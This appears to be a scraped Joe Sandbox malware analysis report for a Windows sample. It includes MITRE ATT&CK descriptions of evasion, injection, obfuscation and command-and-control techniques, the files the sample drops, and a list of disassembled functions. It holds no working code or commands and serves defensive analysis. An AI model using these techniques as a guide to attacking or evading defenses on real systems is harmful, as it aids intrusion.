Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iwEnYIOol8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dkrgxlh.zmk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xpfagcd.vir.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsulpt3u.e2g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw4cdylp.fbe.ps1

C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens\storfavoritters.tid

C:\Users\user\AppData\Roaming\erstatningsgraden\adstringe.Tel

C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic

C:\Users\user\AppData\Roaming\erstatningsgraden\preappearance.glu

C:\Users\user\AppData\Roaming\erstatningsgraden\reaktiv.ove

Static File Info

General

File Icon

Windows Analysis Report
iwEnYIOol8.exe

Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre